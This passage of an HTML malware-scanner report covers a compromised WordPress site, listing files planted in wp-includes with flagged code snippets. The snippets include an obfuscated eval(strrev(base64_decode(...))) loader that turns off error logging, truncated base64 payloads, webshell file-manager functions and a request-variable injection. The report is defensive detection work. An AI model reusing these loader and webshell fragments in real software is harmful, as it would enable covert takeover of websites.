<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1024</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' KB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$bytes </span><span style="color: #007700">. </span><span style="color: #DD0000">' By'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">renderFileList</span><span style="color: #007700">(</span><span style="color: #0000BB">$GetPath</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 87</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">LoadFile</span><span style="color: #007700">(</span><span style="color: #0000BB">$GetPath</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Y2hy</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_76").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/8xGw7MricdA.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 51.75 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 22:05:15</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 22:05:15</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_77" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd+KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlfTspKSkpT0REc1Bnb18kKGxaWVZfKGs4ZmRHSktUV18kKGV0YWxmbml6Zyh2ZXJydHMgbnJ1dGVyO2s4ZmRHSktUV18kbGFib2xnO0pyWU42XyRsYWJvbGd7KU9ERHNQZ29fJCg1TWlFMkVWUm5BQWdVcE9UXyBub2l0Y251ZjtdNzAwMHgwW134pstbU0xBQk9MRyQ9azhmZEdKS1RXXyQ7XTYwMHgwW134pstbU0xBQk9MRyQ9SnJZTjZfJH07OUVZYm1fJCBucnV0ZXI7KSkpXTUweDBbXfimy1tTTEF...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; $MAIqK = '</span><span style="color: #0000BB">strrev</span><span style="color: #DD0000">'; ini_set('</span><span style="color: #0000BB">display_errors</span><span style="color: #DD0000">', 0); ini_set('</span><span style="color: #0000BB">error_log</span><span style="color: #DD0000">', NULL); error_reporting(0); ini_set('</span><span style="color: #0000BB">log_errors</span><span style="color: #DD0000">', 0); eval($MAIqK($eyxBz('</span><span style="color: #0000BB">OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd</span><span style="color: #007700">+</span><span style="color: #0000BB">KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2Z</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$MAIqK</span><span style="color: #007700">(</span><span style="color: #0000BB">$eyxBz</span><span style="color: #007700">(</span><span style="color: #DD0000">'OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd+KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlfTspKSkpT0REc1Bnb18kKGxaWVZfKGs4ZmRHSktUV18kKGV0YWxmbml6Zyh2ZXJydHMgbnJ1dGVyO2s4ZmRHSktUV18kbGFib2xnO0pyWU42XyRsYWJvbGd7KU9ERHNQZ29fJCg1TWlFMkVWUm5BQWdVcE9UXyBub2l0Y251ZjtdNzAwMHgwW134pstbU0xBQk9MRyQ9azhmZEdKS1RXXyQ7XTYwMHgwW134pstbU0xBQk9MRyQ9SnJZTjZfJH07OUVZYm1fJCBucnV0ZXI7KSkp...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev eval_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">LavE</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">VJag</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_77").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/Requests/bottom_1769473234.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.03 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 02:20:59</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 02:20:59</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 22</span><br><table id="file_78" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 108</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$__</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$_</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() { if (</span><span style="color: #0000BB">confirm</span><span style="color: #007700">(</span><span style="color: #DD0000">'Delete?'</span><span style="color: #007700">)) </span><span style="color: #0000BB">_0x02</span><span style="color: #007700">(</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0x17</span><span style="color: #007700">), </span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">getAttribute</span><span style="color: #007700">(</span><span style="color: #DD0000">'data-path'</span><span style="color: #007700">)); }); }); </span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">querySelectorAll</span><span style="color: #007700">(</span><span style="color: #DD0000">'.rename-btn'</span><span style="color: #007700">).forEach(</span><span style="color: #0000BB">_0x9b </span><span style="color: #007700">=> { </span><span style="color: #0000BB">_0x9b</span><span style="color: #007700">[</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0xf</span><span style="color: #007700">)](</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0x11</span><span style="color: #007700">), function() { const </span><span style="color: #0000BB">_0xname </span><span style="color: #007700">= </span><span style="color: #0000BB">prompt</span><span style="color: #007700">(</span><span style="color: #DD0000">'New name:'</span><span style="color: #007700">, </span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">getAttribute</span><span style="color: #007700">(</span><span style="color: #DD0000">'data-</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 12</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_absolute_root</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$script_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$pos</span><span style="color: #007700">);}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 172</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 175</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">_0x1b</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x2c</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 176</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">_0x5f2e</span><span style="color: #007700">[</span><span style="color: #0000BB">_0x1b</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 179</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">_0x54</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x32</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x1a</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'\\'</span><span style="color: #007700">, </span><span style="color: #DD0000">'/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'DOCUMENT_ROOT'</span><span style="color: #007700">]), </span><span style="color: #DD0000">'/'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">displayPathItem</span><span style="color: #007700">(</span><span style="color: #0000BB">$title</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">) {print </span><span style="color: #DD0000">"<div class='path-nav'><strong></span><span style="color: #007700">{</span><span style="color: #0000BB">$title</span><span style="color: #007700">}</span><span style="color: #DD0000">:</strong>" </span><span style="color: #007700">. </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #DD0000">"</div>"</span><span style="color: #007700">;}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 25</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">PathCl</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">Result</span><span style="color: #007700">(</span><span style="color: #0000BB">$Int</span><span style="color: #007700">) {</span><span style="color: #0000BB">$I</span><span style="color: #007700">=array(</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'P'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Q'</span><span style="color: #007700">,</span><span style="color: #DD0000">'T'</span><span style="color: #007700">,</span><span style="color: #DD0000">'U'</span><span style="color: #007700">,</span><span style="color: #DD0000">'M'</span><span style="color: #007700">,</span><span style="color: #DD0000">'V'</span><span style="color: #007700">,</span><span style="color: #DD0000">'h'</span><span style="color: #007700">,</span><span style="color: #DD0000">'E'</span><span style="color: #007700">,</span><span style="color: #DD0000">'L'</span><span style="color: #007700">,</span><span style="color: #DD0000">'l'</span><span style="color: #007700">,</span><span style="color: #DD0000">'0'</span><span style="color: #007700">,</span><span style="color: #DD0000">'K'</span><span style="color: #007700">,</span><span style="color: #DD0000">'8'</span><span style="color: #007700">,</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'l'</span><span style="color: #007700">,</span><span style="color: #DD0000">'a'</span><span style="color: #007700">,</span><span style="color: #DD0000">'U'</span><span style="color: #007700">,</span><span style="color: #DD0000">'D'</span><span style="color: #007700">,</span><span style="color: #DD0000">'e'</span><span style="color: #007700">,</span><span style="color: #DD0000">'4'</span><span style="color: #007700">,</span><span style="color: #DD0000">'I'</span><span style="color: #007700">,</span><span style="color: #DD0000">'m'</span><span style="color: #007700">,</span><span style="color: #DD0000">'1'</span><span style="color: #007700">,</span><span style="color: #DD0000">'5'</span><span style="color: #007700">,</span><span style="color: #DD0000">'s'</span><span style="color: #007700">,</span><span style="color: #DD0000">'b'</span><span style="color: #007700">,</span><span style="color: #DD0000">'R'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Y'</span><span style="color: #007700">,</span><span style="color: #DD0000">'O'</span><span style="color: #007700">,</span><span style="color: #DD0000">'u'</span><span style="color: #007700">,</span><span style="color: #DD0000">'W'</span><span style="color: #007700">,</span><span style="color: #DD0000">'X'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Z'</span><span style="color: #007700">,</span><span style="color: #DD0000">'+'</span><span style="color: #007700">,</span><span style="color: #DD0000">'c'</span><span style="color: #007700">,</span><span style="color: #DD0000">'@'</span><span style="color: #007700">,</span><span style="color: #DD0000">'d'</span><span style="color: #007700">,</span><span style="color: #DD0000">'3'</span><span style="color: #007700">,</span><span style="color: #DD0000">'r'</span><span style="color: #007700">,</span><span style="color: #DD0000">'F'</span><span style="color: #007700">,</span><span style="color: #DD0000">')'</span><span style="color: #007700">,</span><span style="color: #DD0000">'B'</span><span style="color: #007700">,</span><span style="color: #DD0000">'y'</span><span style="color: #007700">,</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'J'</span><span style="color: #007700">,</span><span style="color: #DD0000">'q'</span><span style="color: #007700">,</span><span style="color: #DD0000">'G'</span><span style="color: #007700">,</span><span style="color: #DD0000">'#'</span><span style="color: #007700">,</span><span style="color: #DD0000">'S'</span><span style="color: #007700">,</span><span style="color: #DD0000">'o'</span><span style="color: #007700">,</span><span style="color: #DD0000">'H'</span><span style="color: #007700">,</span><span style="color: #DD0000">'4'</span><span style="color: #007700">,</span><span style="color: #DD0000">'A'</span><span style="color: #007700">,</span><span style="color: #DD0000">'i'</span><span style="color: #007700">,</span><span style="color: #DD0000">'j'</span><span style="color: #007700">,</span><span style="color: #DD0000">'t'</span><span style="color: #007700">,</span><span style="color: #DD0000">'v'</span><span style="color: #007700">,</span><span style="color: #DD0000">'w'</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">' / '</span><span style="color: #007700">, </span><span style="color: #0000BB">$breadcrumbs</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getPermissions</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 47</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"</span><span style="color: #0000BB">$readable</span><span style="color: #DD0000"> </span><span style="color: #0000BB">$writable</span><span style="color: #DD0000"> </span><span style="color: #0000BB">$executable</span><span style="color: #DD0000">"</span><span style="color: #007700">;}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">formatFileSize</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1073741824</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' GB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 51</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1048576</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' MB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 52</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1024</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' KB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$bytes </span><span style="color: #007700">. </span><span style="color: #DD0000">' By'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">renderFileList</span><span style="color: #007700">(</span><span style="color: #0000BB">$GetPath</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 87</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">LoadFile</span><span style="color: #007700">(</span><span style="color: #0000BB">$GetPath</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Y2hy</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_78").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/Requests/src/Exception/Http/Http/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.51 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:15:03</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:15:03</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_79" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'wk6UEFf4PKI2C8tXvWOVDZEy6ZMeZdsnzmRfY86P72LPf5+P5xHn6/7N9o0zu/653GMzvf0RH/RtXt1nU5Q0yasrntqMNc563DTOf92T+9d5O6tr34Fvc5b3Nxbud5jLNgnHanGvZy3Y8qojP18nFSKqN3Gn5+3slF/9+i8j+4vv5saUSYPgZMKFcXzD1sSKx3Nf636XzK+8qNOAVweQ5MiedrMe1bwaRIg3E9CKMKvazBTEz1+1n6seYnnqkey9ByC8cmQFa/M9oXhPMREvI1YYgMww0+iklphw3tbYGWJ1XhxVAY/9ix6QMD64OS9ViC6o3Pxd3at9mF0T6VvBB4DyoGs5Lbu88rbF0BrsVrVp6JzEUrseE8x42vys/J1+5L2rzL+Ybnf9yZ9aLkO7bgqUDiuoq4r13jTpq1A+XbMJuYdJOM9b31fRc3U9/oimt2R0fBZVjqIAB4x2tiBgKtjrxzBmZmxjx9KeOvcI96iHWj691R7...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit global_var_string <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}</span>
</span>
